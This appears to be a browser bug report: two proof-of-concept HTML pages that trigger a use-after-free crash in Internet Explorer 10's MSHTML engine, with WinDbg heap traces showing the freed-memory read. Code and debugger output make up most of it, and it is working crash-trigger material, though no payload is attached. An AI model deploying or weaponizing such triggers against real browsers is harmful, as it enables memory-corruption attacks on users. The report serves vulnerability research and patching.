Analyzed with Page Heap Enabled
Win7 32-bit
IE 10


Code:
PoC - 1:


<!doctype html>
<html><HEAD>
<title>case148472.html</title>
<meta http-equiv="Content-type" content="text/html;charset=UTF-8">
<style>
/* Generated content: every element that is the fifth child of its parent gets
   a ::before pseudo-element with the text 'moof'. */
*:nth-child(5)::before {
	content: 'moof';
}
/* Every element that is the third child of its parent is laid out as inline-block. */
*:nth-child(3) {
	display: inline-block;
}
</style>
</HEAD>
<body><script>
// Crash test case for the stated setup (IE 10, Win7 32-bit, page heap enabled).
// It builds a small DOM tree in an editable body, selects a text range and then
// removes one node. The WinDbg trace on this page faults in
// MSHTML!CGeneratedContent::Doc on memory whose free stack runs through
// CGeneratedTreeNode::SubRelease and the HTML editor's caret code; the page
// does not say which of its two test cases produced that trace.
// All variables below are implicit globals (no var).

// Puts the whole body into editing mode.
document.body.contentEditable = 'true';
 
// Nine detached elements; only their position in the tree matters below.
elem1 = document.createElement('applet')
elem2 = document.createElement('table')
elem3 = document.createElement('br')
elem4 = document.createElement('q')
elem5 = document.createElement('dialog')
elem6 = document.createElement('s')
elem7 = document.createElement('h6')
elem8 = document.createElement('b')
elem9 = document.createElement('table')


// Tree as requested through the DOM API:
//   body > elem1 > [elem2, elem3, elem8]
//   elem2 > [elem4, elem5, elem6, elem7, elem9]
// elem9 is the fifth child of elem2, so it matches the ::before rule above;
// elem8 is the third child of elem1, so it matches the inline-block rule.
document.body.appendChild(elem1)
elem1.appendChild(elem2)
elem1.appendChild(elem3)
elem2.appendChild(elem4)
elem2.appendChild(elem5)
elem2.appendChild(elem6)
elem2.appendChild(elem7)
elem1.appendChild(elem8)
elem2.appendChild(elem9)
		
// createTextRange() is the legacy IE text-range API. The range is moved onto
// elem8 and its end is then extended by three characters.
rangeTxt = document.body.createTextRange()
startNode = elem8
rangeTxt.moveToElementText(startNode)
// The count is passed as the string '3'; presumably it is coerced to a number.
rangeTxt.moveEnd('character', '3')
		
// Makes the range the current selection. A script exception is swallowed and
// only reported by writing a marker string into the document.
try{
	rangeTxt.select()
}
catch(exception){
	document.write(' Bing0! ')
}
		
// Removes the first child of elem2 while the selection exists. The remaining
// siblings shift up one position, so elem9 is no longer a fifth child and
// stops matching the ::before rule.
elem4.parentNode.removeChild(elem4)
				
</script></body></html>


PoC - 2:


<!doctype html>
<html><HEAD><title>case264387.html</title>
<meta http-equiv="Content-type" content="text/html;charset=UTF-8">
<style>
/* Generated content: every element that is the fifth child of its parent gets
   a ::before pseudo-element with the text 'moof'. */
*:nth-child(5)::before {
	content: 'moof';
}
</style>
</HEAD><body>
<script>
// Second crash test case for the stated setup (IE 10, Win7 32-bit, page heap
// enabled). It builds a DOM tree in an editable body, selects the whole body
// as a text range and re-parents two nodes once DOMContentLoaded fires.
// The page does not say which of its two test cases produced the WinDbg trace.
// All variables below are implicit globals (no var).


// Puts the whole body into editing mode.
document.body.contentEditable = 'true';
 
// Nine detached elements; only their position in the tree matters below.
elem0 = document.createElement('audio')
elem1 = document.createElement('noscript')
elem2 = document.createElement('center')
elem3 = document.createElement('u')
elem4 = document.createElement('li')
elem5 = document.createElement('dd')
elem6 = document.createElement('rt')
elem7 = document.createElement('noframes')
elem8 = document.createElement('embed')


// Tree as requested through the DOM API:
//   body > elem0 > elem1 > [elem2, elem3, elem4, elem5, elem6, elem7, elem8]
// elem6 is the fifth child of elem1, so it matches the ::before rule above.
document.body.appendChild(elem0)
elem0.appendChild(elem1)
elem1.appendChild(elem2)
elem1.appendChild(elem3)
elem1.appendChild(elem4)
elem1.appendChild(elem5)
elem1.appendChild(elem6)
elem1.appendChild(elem7)
elem1.appendChild(elem8)


// Legacy IE text-range API: a range over the body is made the current
// selection. This call is not wrapped in try/catch.
rangeTxt = document.body.createTextRange()
rangeTxt.select()


// DOMContentLoaded handler. It is a global function that happens to share its
// name with the element method it calls.
function insertAdjacentElement(){
	try{
		// Moves elem5 out of elem1 to become the first child of elem0. The
		// siblings after it shift up, so elem7 rather than elem6 is now the
		// fifth child of elem1.
		elem0.insertAdjacentElement('afterbegin', elem5);
		// elem2 is still a descendant of elem0 here, so this asks to insert an
		// ancestor into its own descendant. How IE 10 handles that request is
		// not shown on the page.
		elem2.insertAdjacentElement('beforeend', elem0);
	}
	catch(exception){
		// A script exception is swallowed and only reported by writing a
		// marker string into the document.
		document.write(' bing0 ')
	}
}
// The handler runs after parsing has finished, i.e. after the select() call above.
document.addEventListener('DOMContentLoaded', insertAdjacentElement, false)


</script></body></html>
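Debugger output (WinDbg, page heap enabled). The faulting read at eax+0Ah lands in a block that `!heap -p -a eax` reports as already freed, i.e. a use-after-free read; the page does not say which of the two test cases produced this trace:
2:038> g
(a68.d98): Access violation - code c0000005 (first chance)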
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=083f8f70 ebx=0500b6a0 ecx=e33f92e2 edx=00020040 esi=0805cfa0 edi=083f8f70
eip=6685a5c0 esp=0500b5a4 ebp=0500b5d0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
MSHTML!CGeneratedContent::Doc:
6685a5c0 f6400a10        test    byte ptr [eax+0Ah],10h     ds:0023:083f8f7a=??




2:038> !heap -p -a eax
    address 083f8f70 found in
    _DPH_HEAP_ROOT @ 1391000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    8372bc8:          83f8000             2000
    6fa190b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    778166ac ntdll!RtlDebugFreeHeap+0x0000002f
    777da13e ntdll!RtlpFreeHeap+0x0000005d
    777a65a6 ntdll!RtlFreeHeap+0x00000142
    7620c484 kernel32!HeapFree+0x00000014
    66d2322b MSHTML!CGeneratedTreeNode::SubRelease+0x00000059
    669c786a MSHTML!CGeneratedTreeNode::Release+0x00000049
    66d428fa MSHTML!CGeneratedContentInfo::ReleaseNodes+0x00000136
    66a0378b MSHTML!CElement::ComputeFormatsVirtual+0x00002641
    66d9149c MSHTML!CElement::ComputeFormats+0x00000208
    6685bb89 MSHTML!CTreeNode::ComputeFormats+0x00000093
    66da64c4 MSHTML!CGeneratedElement::ComputeFormatsVirtual+0x0000009e
    66c4d661 MSHTML!CTreeNode::ComputeFormats+0x0000018d
    6685be6f MSHTML!CTreeNode::ComputeFormatsHelper+0x0000003a
    66aa031b MSHTML!CTreeNode::GetFancyFormat+0x0000003e
    66c4cf6b MSHTML!CTreeNode::CacheStyleForLayout+0x0000002f
    67115271 MSHTML!TextBlock_IsValidInsertionPosition+0x00000048
    6741b2a0 MSHTML!memcpy+0x0013f642
    66a7a2a2 MSHTML!CHTMLEditor::GetSiteContainer+0x0000004e
    66a79bbc MSHTML!CHTMLEditor::AdjustPointer+0x00000293
    66a79901 MSHTML!CEditTracker::AdjustPointerForInsert+0x00000087
    66a7a908 MSHTML!CCaretTracker::PositionCaretAt+0x00000153
    66a7ab4b MSHTML!CCaretTracker::Init2+0x000000ab
    66a792cf MSHTML!CSelectionManager::SetCurrentTracker+0x0000002e
    672997da MSHTML!CSelectionManager::PositionCaret+0x0000003e
    672c82c4 MSHTML!CSelectTracker::BecomePassive+0x0000008d
    672cc32d MSHTML!CSelectTracker::HandleMessagePrivate+0x000001bf
    672cc9de MSHTML!CSelectTracker::HandleEvent+0x00000180
    66d3c2f9 MSHTML!CSelectionManager::HandleEvent+0x0000008b
    66d3c4fd MSHTML!CHTMLEditor::PostHandleEvent+0x0000007d
    66d3c476 MSHTML!CHTMLEditorProxy::PostHandleEvent+0x0000001e
    66a96084 MSHTML!CDoc::HandleSelectionMessage+0x00000124